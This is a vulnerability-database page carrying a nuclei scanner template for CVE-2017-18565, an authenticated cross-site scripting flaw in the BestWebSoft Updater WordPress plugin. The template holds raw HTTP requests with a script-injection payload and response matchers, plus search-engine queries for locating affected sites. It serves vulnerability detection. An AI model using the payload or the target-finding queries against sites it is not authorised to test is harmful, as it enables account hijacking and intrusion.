Lucene search
K

Updater by BestWebSoft < 1.35 - Cross-Site Scripting

🗓️ 14 Jun 2026 03:03:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Updater plugin by BestWebSoft for WordPress < 1.35 has XSS issue

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress updater plugin cross-site scripting vulnerability
23 Aug 201900:00
cnvd
CVE
CVE-2017-18565
21 Aug 201912:36
cve
Cvelist
CVE-2017-18565
21 Aug 201912:36
cvelist
EUVD
EUVD-2017-9681
7 Oct 202500:30
euvd
NVD
CVE-2017-18565
21 Aug 201913:15
nvd
OSV
CVE-2017-18565
21 Aug 201913:15
osv
Prion
Cross site scripting
21 Aug 201913:15
prion
RedhatCVE
CVE-2017-18565
9 Jan 202610:35
redhatcve
wpexploit
Multiple BestWebSoft Plugins - Authenticated Cross-Site Scripting (XSS)
12 Apr 201700:00
wpexploit
WPVulnDB
Multiple BestWebSoft Plugins - Authenticated Cross-Site Scripting (XSS)
12 Apr 201700:00
wpvulndb
Rows per page
id: CVE-2017-18565

info:
  name: Updater by BestWebSoft < 1.35 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The updater plugin before 1.35 for WordPress has multiple XSS issues.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
  remediation: |
    Update to version 1.35 or later.
  reference:
    - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18565
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18565
    - https://wordpress.org/plugins/updater/#developers
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18565
    cwe-id: CWE-79
    epss-score: 0.00097
    epss-percentile: 0.27005
    cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: bestwebsoft
    product: updater
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/updater/
    fofa-query: body=/wp-content/plugins/updater/
    publicwww-query: "/wp-content/plugins/updater/"
  tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/updater/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
          - 'contains(body_3, "Updater by BestWebSoft")'
        condition: and
# digest: 490a0046304402201910b37eeaefa9031be4a9994961c5678214504bc0b94f506edc346f0c36fdb2022061118de6efbd37f6d8f08238418fc62141ab5d1b35d5e266baf9f81d467ccf94:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 24.3
CVSS 36.1
EPSS0.00097
23